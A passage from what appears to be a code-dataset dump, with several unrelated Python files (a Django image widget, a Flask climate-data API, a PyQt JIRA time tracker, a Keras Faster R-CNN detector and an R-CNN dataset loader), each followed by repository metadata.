        super(DropImageWidget, self).__init__(area_label, fileupload_url, attrs=attrs)
        self.filetype = 'image'

    def update_attributes(self, attrs, value):
        # Nothing to preview without a stored value or a renderable thumbnail.
        if not value:
            return
        background_url = self.get_background_url(value)
        if not background_url:
            return
        attrs.update({
            'style': 'background-image: url({});'.format(background_url),
            'current-file': self.signer.sign(value.name),
        })

    def get_background_url(self, value):
        """Return a thumbnail URL for `value`, or None if it is not a valid image."""
        from easy_thumbnails.exceptions import InvalidImageFormatError
        from easy_thumbnails.files import get_thumbnailer
        try:
            return get_thumbnailer(value).get_thumbnail(app_settings.THUMBNAIL_OPTIONS).url
        except InvalidImageFormatError:
            return None
| 40.166667 | 110 | 0.611803 | 3,968 | 0.914707 | 0 | 0 | 0 | 0 | 0 | 0 | 807 | 0.18603 |
a4ec750dd9642849d8795ee448336dfcac80d1cf | 347 | py | Python | chapter2/wok/develop/examples/multiport/sum.py | chris-zen/phd-thesis | 1eefdff8e7ca1910304e27ae42551dc64496b101 | [
"Unlicense"
] | 1 | 2015-12-22T00:53:18.000Z | 2015-12-22T00:53:18.000Z | chapter2/wok/master/examples/multiport/sum.py | chris-zen/phd-thesis | 1eefdff8e7ca1910304e27ae42551dc64496b101 | [
"Unlicense"
] | null | null | null | chapter2/wok/master/examples/multiport/sum.py | chris-zen/phd-thesis | 1eefdff8e7ca1910304e27ae42551dc64496b101 | [
"Unlicense"
] | null | null | null | from wok.task import task
@task.main()
def main():
    """Read numbers from port "x" and emit their count and sum on the
    "count" and "sum" ports respectively."""
    values, count_port, sum_port = task.ports("x", "count", "sum")
    n = 0
    total = 0
    for value in values:
        task.logger.info("value = {0}".format(value))
        n += 1
        total += value
    task.logger.info("Sum of {0} numbers = {1}".format(n, total))
    count_port.send(n)
    sum_port.send(total)
# Hand control to the Wok framework, which invokes the decorated task.
task.run()
| 16.52381 | 64 | 0.634006 | 0 | 0 | 0 | 0 | 307 | 0.884726 | 0 | 0 | 54 | 0.15562 |
a4ed98ab3c23c6597228e8de2632140feeb4c5d4 | 2,961 | py | Python | climateapp/climateapp/routes.py | mpasricha1/sqlalchemy-challenge | 94a679cee2da1f7942f89dfcc50e7c4d6adc5e96 | [
"ADSL"
] | null | null | null | climateapp/climateapp/routes.py | mpasricha1/sqlalchemy-challenge | 94a679cee2da1f7942f89dfcc50e7c4d6adc5e96 | [
"ADSL"
] | null | null | null | climateapp/climateapp/routes.py | mpasricha1/sqlalchemy-challenge | 94a679cee2da1f7942f89dfcc50e7c4d6adc5e96 | [
"ADSL"
] | null | null | null | from flask import jsonify, render_template
import sqlalchemy
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine, func
import datetime as dt
from climateapp import app
# Connect to the SQLite database and reflect its tables into mapped classes.
engine = create_engine('sqlite:///../Resources/hawaii.sqlite')
Base = automap_base()
Base.prepare(engine,reflect=True)
# Handles to the two reflected tables used by the routes below.
Measurements = Base.classes.measurement
Stations = Base.classes.station
@app.route('/')
def home():
    """Render the landing page."""
    return render_template('index.html')
@app.route('/api/v1.0/precipitation')
def perciptation():
    """Return daily total precipitation for the final year of data as JSON.

    Response: a list of {"date": 'YYYY-MM-DD', "prcp": total} objects covering
    the 365 days up to the most recent measurement date.
    (Function name keeps the original spelling so the Flask endpoint name,
    and any url_for() callers, are unchanged.)
    """
    session = Session(engine)
    # Most recent measurement date; dates are stored as 'YYYY-MM-DD' strings
    # (the original code parsed them with that exact strptime format).
    lastDate = session.query(Measurements.date).order_by(Measurements.date.desc()).first()
    date = dt.datetime.strptime(lastDate[0], "%Y-%m-%d")
    # One year earlier, formatted back to 'YYYY-MM-DD' so plain string
    # comparison against the stored dates is correct. The original compared
    # strftime("%Y-%m-%d)", ...) — note the stray ')' in the format — against
    # str(datetime), which includes a time-of-day suffix; both are fixed here.
    year_ago = (date - dt.timedelta(days=365)).strftime("%Y-%m-%d")
    sel = [Measurements.date,
           func.sum(Measurements.prcp)]
    data = session.query(*sel).filter(Measurements.date >= year_ago).\
        group_by(Measurements.date).all()
    session.close()
    returnList = []
    for row in data:
        dateDict = {}
        dateDict["date"] = row.date
        dateDict["prcp"] = row[1]
        returnList.append(dateDict)
    return jsonify(returnList)
@app.route('/api/v1.0/stations')
def stations():
    """Return every weather station (id and name) as JSON."""
    session = Session(engine)
    rows = session.query(Stations.station, Stations.name).all()
    session.close()
    payload = [{"station": station_id, "name": station_name}
               for station_id, station_name in rows]
    return jsonify(payload)
@app.route('/api/v1.0/tobs')
def tobs():
    """Return min/max/avg temperature observations for the most active station.

    The most active station is the one with the largest number of measurement
    rows. Response: a one-element list of {"station", "min", "max", "avg"}.
    """
    session = Session(engine)
    # Rank stations by measurement count and keep the busiest one.
    sel = [Stations.station,
           func.count(Measurements.station)]
    rankedStations = session.query(*sel).filter(Measurements.station == Stations.station).\
        group_by(Measurements.station).order_by(func.count(Measurements.station).desc()).first()
    # The original looped over the result row just to read its .station
    # attribute each iteration; read it directly instead.
    bestId = rankedStations.station
    sel = [Stations.station,
           func.min(Measurements.tobs),
           func.max(Measurements.tobs),
           func.avg(Measurements.tobs)
           ]
    data = session.query(*sel).\
        filter(Measurements.station == Stations.station).\
        filter(Stations.station == bestId).all()
    session.close()
    returnList = []
    for row in data:
        tobsDict = {}
        tobsDict["station"] = row.station
        tobsDict["min"] = row[1]
        tobsDict["max"] = row[2]
        tobsDict["avg"] = row[3]
        returnList.append(tobsDict)
    return jsonify(returnList)
@app.route('/api/v1.0/<start>')
def start(start):
    """Return [min, avg, max] temperature from `start` date onward (inclusive)."""
    session = Session(engine)
    data = session.query(func.min(Measurements.tobs), func.avg(Measurements.tobs), func.max(Measurements.tobs)).\
        filter(Measurements.date >= start).all()
    # Close the session before returning; the original leaked it (every other
    # route in this module closes its session).
    session.close()
    return jsonify(data)
@app.route('/api/v1.0/<start>/<end>')
def dateRange(start,end):
    """Return [min, avg, max] temperature between `start` and `end` (inclusive)."""
    session = Session(engine)
    data = session.query(func.min(Measurements.tobs), func.avg(Measurements.tobs), func.max(Measurements.tobs)).\
        filter(Measurements.date >= start).\
        filter(Measurements.date <= end).all()
    # Close the session before returning; the original leaked it (every other
    # route in this module closes its session).
    session.close()
    return jsonify(data)
a4ef4d853adb1eeb401e5c0eff70d44d9f924121 | 9,443 | py | Python | parse_jira_logged_time/gui.py | gil9red/SimplePyScripts | c191ce08fbdeb29377639184579e392057945154 | [
"CC-BY-4.0"
] | 117 | 2015-12-18T07:18:27.000Z | 2022-03-28T00:25:54.000Z | parse_jira_logged_time/gui.py | gil9red/SimplePyScripts | c191ce08fbdeb29377639184579e392057945154 | [
"CC-BY-4.0"
] | 8 | 2018-10-03T09:38:46.000Z | 2021-12-13T19:51:09.000Z | parse_jira_logged_time/gui.py | gil9red/SimplePyScripts | c191ce08fbdeb29377639184579e392057945154 | [
"CC-BY-4.0"
] | 28 | 2016-08-02T17:43:47.000Z | 2022-03-21T08:31:12.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
import json
import io
import sys
import traceback
import webbrowser
from contextlib import redirect_stdout
from datetime import datetime
from PyQt5.Qt import (
QApplication, QMessageBox, QThread, pyqtSignal, QMainWindow, QPushButton, QCheckBox, QPlainTextEdit,
QVBoxLayout, QHBoxLayout, QTextOption, QTableWidget, QWidget, QSizePolicy, QSplitter, Qt, QTableWidgetItem,
QProgressDialog, QHeaderView, QSystemTrayIcon, QIcon, QEvent, QTimer
)
from main import (
DIR, get_rss_jira_log, parse_logged_dict, get_logged_list_by_now_utc_date, get_logged_total_seconds,
get_sorted_logged, seconds_to_str
)
def log_uncaught_exceptions(ex_cls, ex, tb):
    """Global excepthook: print the traceback, show it in a dialog, then exit."""
    message = f'{ex_cls.__name__}: {ex}:\n' + ''.join(traceback.format_tb(tb))
    print(message)
    QMessageBox.critical(None, 'Error', message)
    sys.exit(1)
# Route all uncaught exceptions through the GUI-aware handler defined above.
sys.excepthook = log_uncaught_exceptions
class RunFuncThread(QThread):
    """Worker thread that calls `func` and emits its return value."""

    # Emitted with the callable's result once it has finished running.
    run_finished = pyqtSignal(object)

    def __init__(self, func):
        super().__init__()
        self.func = func

    def run(self):
        result = self.func()
        self.run_finished.emit(result)
# Base window title; a last-refresh timestamp is appended to it at runtime.
WINDOW_TITLE = 'parse_jira_logged_time'
class MainWindow(QMainWindow):
    """Main window: per-day JIRA logged-time totals, a per-day breakdown,
    a raw text log mirroring console output, and a system-tray icon that
    toggles the window's visibility."""

    def __init__(self):
        super().__init__()
        self.setWindowTitle(WINDOW_TITLE)
        file_name = str(DIR / 'favicon.ico')
        icon = QIcon(file_name)
        self.setWindowIcon(icon)
        # Tray icon: clicking it shows/hides the window (see _on_tray_activated).
        self.tray = QSystemTrayIcon(icon)
        self.tray.setToolTip(self.windowTitle())
        self.tray.activated.connect(self._on_tray_activated)
        self.tray.show()
        # date string -> list of logged work entries; filled by _fill_tables().
        self.logged_dict = dict()
        self.pb_refresh = QPushButton('REFRESH')
        self.pb_refresh.clicked.connect(self.refresh)
        # Checkbox toggling visibility of the raw log pane.
        self.cb_show_log = QCheckBox()
        self.cb_show_log.setChecked(True)
        # Read-only, monospaced, non-wrapping log pane.
        self.log = QPlainTextEdit()
        self.log.setReadOnly(True)
        self.log.setWordWrapMode(QTextOption.NoWrap)
        log_font = self.log.font()
        log_font.setFamily('Courier New')
        self.log.setFont(log_font)
        self.cb_show_log.clicked.connect(self.log.setVisible)
        self.log.setVisible(self.cb_show_log.isChecked())
        # Summary table: one row per day with the day's total logged time.
        header_labels = ['DATE', 'TOTAL LOGGED TIME']
        self.table_logged = QTableWidget()
        self.table_logged.setEditTriggers(QTableWidget.NoEditTriggers)
        self.table_logged.setSelectionBehavior(QTableWidget.SelectRows)
        self.table_logged.setSelectionMode(QTableWidget.SingleSelection)
        self.table_logged.setColumnCount(len(header_labels))
        self.table_logged.setHorizontalHeaderLabels(header_labels)
        self.table_logged.horizontalHeader().setStretchLastSection(True)
        self.table_logged.itemClicked.connect(self._on_table_logged_item_clicked)
        # Detail table: the selected day's individual work-log entries.
        header_labels = ['TIME', 'LOGGED', 'JIRA']
        self.table_logged_info = QTableWidget()
        self.table_logged_info.setEditTriggers(QTableWidget.NoEditTriggers)
        self.table_logged_info.setSelectionBehavior(QTableWidget.SelectRows)
        self.table_logged_info.setSelectionMode(QTableWidget.SingleSelection)
        self.table_logged_info.setColumnCount(len(header_labels))
        self.table_logged_info.setHorizontalHeaderLabels(header_labels)
        self.table_logged_info.horizontalHeader().setSectionResizeMode(1, QHeaderView.ResizeToContents)
        self.table_logged_info.horizontalHeader().setStretchLastSection(True)
        self.table_logged_info.itemDoubleClicked.connect(self._on_table_logged_info_item_double_clicked)
        # Layout: [refresh | show-log checkbox] above a splitter holding
        # (summary + detail tables) on the left and the log pane on the right.
        main_layout = QVBoxLayout()
        central_widget = QWidget()
        central_widget.setLayout(main_layout)
        self.setCentralWidget(central_widget)
        self.pb_refresh.setSizePolicy(QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Preferred))
        h_layout = QHBoxLayout()
        h_layout.addWidget(self.pb_refresh)
        h_layout.addWidget(self.cb_show_log)
        layout_table_widget = QVBoxLayout()
        layout_table_widget.setContentsMargins(0, 0, 0, 0)
        layout_table_widget.addWidget(self.table_logged)
        layout_table_widget.addWidget(self.table_logged_info)
        table_widget = QWidget()
        table_widget.setLayout(layout_table_widget)
        splitter = QSplitter(Qt.Horizontal)
        splitter.addWidget(table_widget)
        splitter.addWidget(self.log)
        main_layout.addLayout(h_layout)
        main_layout.addWidget(splitter)

    def _fill_tables(self, xml_data: bytes):
        """Parse the RSS/XML work-log feed and populate the summary table.

        Everything printed while parsing is captured and mirrored into the
        log pane (and re-printed to the real stdout in the finally block).
        """
        buffer_io = io.StringIO()
        try:
            with redirect_stdout(buffer_io):
                print(len(xml_data), repr(xml_data[:50]))
                # The document structure is XML.
                self.logged_dict = parse_logged_dict(xml_data)
                print(self.logged_dict)
                if not self.logged_dict:
                    return
                print(json.dumps(self.logged_dict, indent=4, ensure_ascii=False))
                print()
                logged_list = get_logged_list_by_now_utc_date(self.logged_dict)
                logged_total_seconds = get_logged_total_seconds(logged_list)
                logged_total_seconds_str = seconds_to_str(logged_total_seconds)
                print('entry_logged_list:', logged_list)
                print('today seconds:', logged_total_seconds)
                print('today time:', logged_total_seconds_str)
                print()
                # Also pretty-print the result as an aligned text table.
                lines = []
                # Remove all existing rows from the summary table.
                while self.table_logged.rowCount():
                    self.table_logged.removeRow(0)
                for i, (date_str, logged_list) in enumerate(get_sorted_logged(self.logged_dict)):
                    total_seconds = get_logged_total_seconds(logged_list)
                    total_seconds_str = seconds_to_str(total_seconds)
                    row = date_str, total_seconds_str, total_seconds
                    lines.append(row)
                    self.table_logged.setRowCount(self.table_logged.rowCount() + 1)
                    self.table_logged.setItem(i, 0, QTableWidgetItem(date_str))
                    item = QTableWidgetItem(total_seconds_str)
                    item.setToolTip('Total seconds: {}'.format(total_seconds))
                    self.table_logged.setItem(i, 1, item)
                # Select the newest day and show its breakdown immediately.
                self.table_logged.setCurrentCell(0, 0)
                self.table_logged.setFocus()
                self._on_table_logged_item_clicked(self.table_logged.currentItem())
                # Transpose rows into columns and take each column's max width.
                max_len_columns = [max(map(len, map(str, col))) for col in zip(*lines)]
                # Build the format string: [30, 14, 5] -> "{:<30} | {:<14} | {:<5}"
                my_table_format = ' | '.join('{:<%s}' % max_len for max_len in max_len_columns)
                for line in lines:
                    print(my_table_format.format(*line))
        finally:
            text = buffer_io.getvalue()
            self.log.setPlainText(text)
            print(text)

    def refresh(self):
        """Fetch the work-log feed on a worker thread behind a busy dialog."""
        progress_dialog = QProgressDialog(self)
        thread = RunFuncThread(func=get_rss_jira_log)
        thread.run_finished.connect(self._fill_tables)
        thread.run_finished.connect(progress_dialog.close)
        thread.start()
        # Range (0, 0) makes the dialog an indeterminate busy indicator.
        progress_dialog.setWindowTitle('Please wait...')
        progress_dialog.setLabelText(progress_dialog.windowTitle())
        progress_dialog.setRange(0, 0)
        progress_dialog.exec()
        self.setWindowTitle(WINDOW_TITLE + ". Last refresh date: " + datetime.now().strftime('%d/%m/%Y %H:%M:%S'))

    def _on_table_logged_item_clicked(self, item: QTableWidgetItem):
        """Show the work-log entries of the day selected in the summary table."""
        # Remove all existing rows from the detail table.
        while self.table_logged_info.rowCount():
            self.table_logged_info.removeRow(0)
        row = item.row()
        date_str = self.table_logged.item(row, 0).text()
        logged_list = self.logged_dict[date_str]
        # Newest entries first.
        logged_list = reversed(logged_list)
        for i, logged in enumerate(logged_list):
            self.table_logged_info.setRowCount(self.table_logged_info.rowCount() + 1)
            self.table_logged_info.setItem(i, 0, QTableWidgetItem(logged['time']))
            self.table_logged_info.setItem(i, 1, QTableWidgetItem(logged['logged_human_time']))
            item = QTableWidgetItem(logged['jira_id'])
            item.setToolTip(logged['jira_title'])
            self.table_logged_info.setItem(i, 2, item)

    def _on_table_logged_info_item_double_clicked(self, item: QTableWidgetItem):
        """Open the double-clicked entry's JIRA issue in the default browser."""
        row = item.row()
        jira_id = self.table_logged_info.item(row, 2).text()
        url = 'https://jira.compassplus.ru/browse/' + jira_id
        webbrowser.open(url)

    def _on_tray_activated(self, reason):
        """Toggle window visibility when the tray icon is clicked."""
        self.setVisible(not self.isVisible())
        if self.isVisible():
            self.showNormal()
            self.activateWindow()

    def changeEvent(self, event: QEvent):
        if event.type() == QEvent.WindowStateChange:
            # If the window was minimized...
            if self.isMinimized():
                # ...hide it from the taskbar (it stays reachable via the tray).
                QTimer.singleShot(0, self.hide)
if __name__ == '__main__':
    app = QApplication([])
    mw = MainWindow()
    mw.resize(1200, 800)
    mw.show()
    # Populate the tables immediately on startup.
    mw.refresh()
    app.exec()
| 34.974074 | 114 | 0.659324 | 8,535 | 0.881442 | 0 | 0 | 0 | 0 | 0 | 0 | 1,004 | 0.103687 |
a4efa6df7bd8bff04aec47fb249d0baf026f7c34 | 10,326 | py | Python | fasterRCNN.py | TangZhenchaoTZC/Keras-mask-detection | 325679d06a12a90b2552ed7d447298a23e3b9d57 | [
"MIT"
] | 3 | 2020-05-26T15:13:06.000Z | 2020-05-27T02:57:27.000Z | fasterRCNN.py | TangZhenchaoTZC/Keras-mask-detection | 325679d06a12a90b2552ed7d447298a23e3b9d57 | [
"MIT"
] | null | null | null | fasterRCNN.py | TangZhenchaoTZC/Keras-mask-detection | 325679d06a12a90b2552ed7d447298a23e3b9d57 | [
"MIT"
] | null | null | null | """fasterRCNN对象创建"""
import numpy as np
import colorsys
import os
from keras import backend as K
from keras.applications.imagenet_utils import preprocess_input
from PIL import Image, ImageFont, ImageDraw
import copy
import math
from net import fasterrcnn as frcnn
from net import netconfig as netconfig
from net import RPN as RPN
from net import tools as tools
class FasterRCNN(object):
_defaults = {
"model_path": './model_data/logs/epoch015-loss1.729-rpn1.025-roi0.704.h5',
"classes_path": './model_data/index.txt',
"confidence": 0.7,
}
@classmethod
def get_defaults(cls, n):
if n in cls._defaults:
return cls._defaults[n]
else:
return "Unrecognized attribute name '" + n + "'"
def __init__(self, **kwargs):
"""初始化faster RCNN"""
self.__dict__.update(self._defaults)
self.class_names = self._get_class()
self.sess = K.get_session()
self.config = netconfig.Config()
self.generate()
self.bbox_util = tools.BBoxUtility()
self.confidence = 0.7
self.classes_path='./model_data/index.txt'
self.model_path='./model_data/logs/epoch015-loss1.729-rpn1.025-roi0.704.h5'
def _get_class(self):
"""获得所有的分类"""
classes_path = os.path.expanduser(self.classes_path)
with open(classes_path) as f:
class_names = f.readlines()
class_names = [c.strip() for c in class_names]
return class_names
def generate(self):
"""获得所有的分类"""
model_path = os.path.expanduser(self.model_path)
assert model_path.endswith('.h5'), 'Keras model or weights must be a .h5 file.'
# 计算总的种类
self.num_classes = len(self.class_names) + 1
# 载入模型,如果原来的模型里已经包括了模型结构则直接载入。
# 否则先构建模型再载入
self.model_rpn, self.model_classifier = frcnn.get_predict_model(self.config, self.num_classes)
self.model_rpn.load_weights(self.model_path, by_name=True)
self.model_classifier.load_weights(self.model_path, by_name=True, skip_mismatch=True)
print('{} model, anchors, and classes loaded.'.format(model_path))
# 画框设置不同的颜色
hsv_tuples = [(x / len(self.class_names), 1., 1.)
for x in range(len(self.class_names))]
self.colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))
self.colors = list(
map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)),
self.colors))
def get_img_output_length(self, width, height):
def get_output_length(input_length):
# input_length += 6
filter_sizes = [7, 3, 1, 1]
padding = [3, 1, 0, 0]
stride = 2
for i in range(4):
# input_length = (input_length - filter_size + stride) // stride
input_length = (input_length + 2 * padding[i] - filter_sizes[i]) // stride + 1
return input_length
return get_output_length(width), get_output_length(height)
def detect_image(self, image):
"""检测图片"""
image_shape = np.array(np.shape(image)[0:2])
old_width = image_shape[1]
old_height = image_shape[0]
# 保存原始图片
old_image = copy.deepcopy(image)
# 把图片的最短边resize到600
width, height = tools.get_new_img_size(old_width, old_height)
image = image.resize([width, height])
# 图片转成数组
photo = np.array(image, dtype=np.float64)
# 图片预处理,归一化
photo = preprocess_input(np.expand_dims(photo, 0))
# 使用RPN预测,获得概率x_class和x_regr
preds = self.model_rpn.predict(photo)
# 将预测结果进行解码
# 获得所有先验框
anchors = RPN.create_anchor(self.get_img_output_length(width, height), width, height)
# 解码获得建议框,这里得到了300个建议框,注意其坐标均为0-1间
rpn_results = self.bbox_util.detection_out(preds, anchors, 1, confidence_threshold=0)
# 将返回的0-1的建议框映射到共享特征图,如果特征图为38*38,值域变成0-38之间,R为300行4列,分别是左上角右下角坐标
R = rpn_results[0][:, 2:]
R[:, 0] = np.array(np.round(R[:, 0] * width / self.config.rpn_stride), dtype=np.int32)
R[:, 1] = np.array(np.round(R[:, 1] * height / self.config.rpn_stride), dtype=np.int32)
R[:, 2] = np.array(np.round(R[:, 2] * width / self.config.rpn_stride), dtype=np.int32)
R[:, 3] = np.array(np.round(R[:, 3] * height / self.config.rpn_stride), dtype=np.int32)
print(R)
# R转换一下,前两列是左上角坐标,后两列是宽和高
R[:, 2] -= R[:, 0]
R[:, 3] -= R[:, 1]
base_layer = preds[2]
delete_line = []
for i, r in enumerate(R):
if r[2] < 1 or r[3] < 1:
delete_line.append(i)
R = np.delete(R, delete_line, axis=0)
bboxes = []
probs = []
labels = []
# 分批次遍历建议框,每批32个
for jk in range(R.shape[0] // self.config.num_rois + 1):
# 取出32个建议框
ROIs = np.expand_dims(R[self.config.num_rois * jk:self.config.num_rois * (jk + 1), :], axis=0)
# 判断建议框是否有效
if ROIs.shape[1] == 0:
break
# 对最后一次整除不全,不能到32个的建议框小批进行填充
if jk == R.shape[0] // self.config.num_rois:
# pad R
curr_shape = ROIs.shape
target_shape = (curr_shape[0], self.config.num_rois, curr_shape[2])
ROIs_padded = np.zeros(target_shape).astype(ROIs.dtype)
ROIs_padded[:, :curr_shape[1], :] = ROIs
ROIs_padded[0, curr_shape[1]:, :] = ROIs[0, 0, :]
ROIs = ROIs_padded
# 将共享特征层和建议框传入end_classifier进行预测
# P_cls为(Batch_size,32个建议框,21)
# P_regr为(Batch_size,32个建议框,80)
[P_cls, P_regr] = self.model_classifier.predict([base_layer, ROIs])
# 判断输出的每批中每个建议框是否真实包含我们要的物体,本身置信度阈值设置为0.9,如果是背景也要跳过
for ii in range(P_cls.shape[1]):
# P_cls[0, ii, :-1]是21个概率组成的列表
if np.max(P_cls[0, ii, :-1]) < self.confidence or np.argmax(P_cls[0, ii, :]) == (P_cls.shape[2] - 1):
continue
# 获得label
label = np.argmax(P_cls[0, ii, :-1])
# 获得坐标信息
(x, y, w, h) = ROIs[0, ii, :]
# 其实就是label
cls_num = np.argmax(P_cls[0, ii, :-1])
# 获取框的信息,并改变数量级
(tx, ty, tw, th) = P_regr[0, ii, 4 * cls_num:4 * (cls_num + 1)]
tx /= self.config.classifier_regr_std[0]
ty /= self.config.classifier_regr_std[1]
tw /= self.config.classifier_regr_std[2]
th /= self.config.classifier_regr_std[3]
# 获取到共享特征层上真实的坐标信息
cx = x + w / 2.
cy = y + h / 2.
cx1 = tx * w + cx
cy1 = ty * h + cy
w1 = math.exp(tw) * w
h1 = math.exp(th) * h
x1 = cx1 - w1 / 2.
y1 = cy1 - h1 / 2.
x2 = cx1 + w1 / 2
y2 = cy1 + h1 / 2
x1 = int(round(x1))
y1 = int(round(y1))
x2 = int(round(x2))
y2 = int(round(y2))
# bboxes是最终从300个建议框过滤出来与目标物体对应的建议框
# 但注意,这里的建议框还是存在重叠现象,因为之前仅仅靠物体置信度来筛选
bboxes.append([x1, y1, x2, y2])
probs.append(np.max(P_cls[0, ii, :-1]))
labels.append(label)
# 没检测到物体,返回
if len(bboxes) == 0:
return old_image
# 将38*38特征层的建议框映射到600*600
# 筛选出其中得分高于confidence的框,因此此时需要再次NMS删除重叠框
labels = np.array(labels)
probs = np.array(probs)
boxes = np.array(bboxes, dtype=np.float32)
boxes[:, 0] = boxes[:, 0] * self.config.rpn_stride / width
boxes[:, 1] = boxes[:, 1] * self.config.rpn_stride / height
boxes[:, 2] = boxes[:, 2] * self.config.rpn_stride / width
boxes[:, 3] = boxes[:, 3] * self.config.rpn_stride / height
results = np.array(
self.bbox_util.nms_for_out(np.array(labels), np.array(probs), np.array(boxes), self.num_classes - 1, 0.4))
top_label_indices = results[:, 0]
top_conf = results[:, 1]
boxes = results[:, 2:]
#top_label_indices=labels
#top_conf=probs
# 大小调整到原图上,此时已经完成了建议框的计算
boxes[:, 0] = boxes[:, 0] * old_width
boxes[:, 1] = boxes[:, 1] * old_height
boxes[:, 2] = boxes[:, 2] * old_width
boxes[:, 3] = boxes[:, 3] * old_height
# simhei.ttf用于设置字体
font = ImageFont.truetype(font='model_data/simhei.ttf',size=np.floor(3e-2 * np.shape(image)[1] + 0.5).astype('int32'))
thickness = (np.shape(old_image)[0] + np.shape(old_image)[1]) // old_width * 2
image = old_image
for i, c in enumerate(top_label_indices):
predicted_class = self.class_names[int(c)]
score = top_conf[i]
left, top, right, bottom = boxes[i]
top = top - 5
left = left - 5
bottom = bottom + 5
right = right + 5
top = max(0, np.floor(top + 0.5).astype('int32'))
left = max(0, np.floor(left + 0.5).astype('int32'))
bottom = min(np.shape(image)[0], np.floor(bottom + 0.5).astype('int32'))
right = min(np.shape(image)[1], np.floor(right + 0.5).astype('int32'))
# 画框框
label = '{} {:.2f}'.format(predicted_class, score)
draw = ImageDraw.Draw(image)
label_size = draw.textsize(label, font)
label = label.encode('utf-8')
print(label)
if top - label_size[1] >= 0:
text_origin = np.array([left, top - label_size[1]])
else:
text_origin = np.array([left, top + 1])
for i in range(thickness):
draw.rectangle(
[left + i, top + i, right - i, bottom - i],
outline=self.colors[int(c)])
draw.rectangle(
[tuple(text_origin), tuple(text_origin + label_size)],
fill=self.colors[int(c)])
draw.text(text_origin, str(label, 'UTF-8'), fill=(0, 0, 0), font=font)
del draw
return image
    def close(self):
        """Release the underlying session held by this detector."""
        # NOTE(review): self.sess is presumably a TensorFlow session opened in
        # __init__ (outside this view) — confirm before relying on this.
        self.sess.close()
a4f1059c2d04d205a4c5db81979affde7f3a6635 | 3,239 | py | Python | applications/popart/faster-rcnn/nanodata/dataset/xml_dataset_for_rcnn.py | payoto/graphcore_examples | 46d2b7687b829778369fc6328170a7b14761e5c6 | [
"MIT"
] | 260 | 2019-11-18T01:50:00.000Z | 2022-03-28T23:08:53.000Z | applications/popart/faster-rcnn/nanodata/dataset/xml_dataset_for_rcnn.py | payoto/graphcore_examples | 46d2b7687b829778369fc6328170a7b14761e5c6 | [
"MIT"
] | 27 | 2020-01-28T23:07:50.000Z | 2022-02-14T15:37:06.000Z | applications/popart/faster-rcnn/nanodata/dataset/xml_dataset_for_rcnn.py | payoto/graphcore_examples | 46d2b7687b829778369fc6328170a7b14761e5c6 | [
"MIT"
] | 56 | 2019-11-18T02:13:12.000Z | 2022-02-28T14:36:09.000Z | # Copyright (c) 2021 Graphcore Ltd. All rights reserved.
# Copyright 2021 RangiLyu.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This file has been modified by Graphcore Ltd.
import numpy as np
import torch
from .xml_dataset import XMLDataset
from utils import logger
# Route all module-level print() calls through the project's global logger
# when one has been configured; otherwise the builtin print is kept.
if logger.GLOBAL_LOGGER is not None:
    print = logger.GLOBAL_LOGGER.log_str
def calc_area(boxes):
    """Return per-box areas for an (n, 4) array of [x1, y1, x2, y2] boxes.

    Args:
        boxes: numpy array of shape (n, 4).

    Returns:
        numpy array of shape (n,) holding (x2 - x1) * (y2 - y1) per row.
    """
    widths = boxes[:, 2] - boxes[:, 0]
    heights = boxes[:, 3] - boxes[:, 1]
    return heights * widths
class XMLDatasetForRcnn(XMLDataset):
    """XML (Pascal-VOC style) dataset adapted for Faster R-CNN training.

    Extends XMLDataset with:
      * optional ``preset_indices`` forcing a fixed sample order,
      * area-based filtering of degenerate ground-truth boxes,
      * padding of boxes/labels to a fixed ``num_gtboxes`` so samples stack,
      * an optional ``extra_layer`` post-processing hook.
    """

    def __init__(self,
                 preset_indices=None,
                 area_filter_thrd=0.0,
                 num_gtboxes=20,
                 specified_length=None,
                 extra_layer=None,
                 **kwargs):
        # Boxes whose area is <= this threshold are dropped in get_train_data.
        self.area_filter_thrd = area_filter_thrd
        # Fixed number of ground-truth slots each sample is padded/truncated to.
        self.num_gtboxes = num_gtboxes
        # Optional explicit sequence of indices consumed via a cursor.
        self.preset_indices = preset_indices
        self._cur_for_preset_indices = 0
        super(XMLDatasetForRcnn, self).__init__(**kwargs)
        self.real_length = len(self.data_info)
        # Reported __len__; defaults to twice the real dataset size so an
        # epoch iterates every sample roughly twice (indices wrap modulo
        # real_length below).
        self.length = self.real_length * 2 if specified_length is None else specified_length
        self.extra_layer = extra_layer

    def get_train_data(self, idx):
        """
        Load image and annotation
        :param idx: sample index (wrapped modulo the real dataset length)
        :return: meta-data (a dict containing image, annotation and other information)
        filter zero area boxes
        """
        if self.preset_indices is None:
            pass
        else:
            # Ignore the caller-supplied idx and follow the preset order.
            idx = self.preset_indices[self._cur_for_preset_indices]
            self._cur_for_preset_indices += 1
        idx = int(idx % self.real_length)
        meta = super().get_train_data(idx)
        # filter boxes and labels by area
        areas = calc_area(meta['gt_bboxes'])
        mask = areas > self.area_filter_thrd
        meta['gt_bboxes'] = meta['gt_bboxes'][mask, :]
        meta['gt_labels'] = meta['gt_labels'][mask]
        meta['db_inds'] = idx
        #
        # pad boxes and inds
        # NOTE(review): if a sample has more than num_gtboxes surviving boxes,
        # the assignment below mixes num_boxes (uncapped) with a capped RHS —
        # confirm upstream guarantees num_boxes <= num_gtboxes.
        boxes = np.zeros((self.num_gtboxes, 4)).astype(np.float32)
        num_boxes = meta['gt_bboxes'].shape[0]
        boxes[:num_boxes, :] = meta['gt_bboxes'][:self.num_gtboxes]
        meta['gt_bboxes'] = torch.from_numpy(boxes)
        labels = np.asarray([0] * self.num_gtboxes)
        labels[:num_boxes] = meta['gt_labels'][:self.num_gtboxes]
        meta['gt_labels'] = torch.from_numpy(labels)
        meta['num_boxes'] = num_boxes
        if num_boxes == 0:
            return None  # return None will re-run this function
        # proc data in extra layer
        if self.extra_layer is not None:
            meta = self.extra_layer(meta)
        return meta

    def __len__(self):
        # Virtual length (see __init__), not the number of distinct samples.
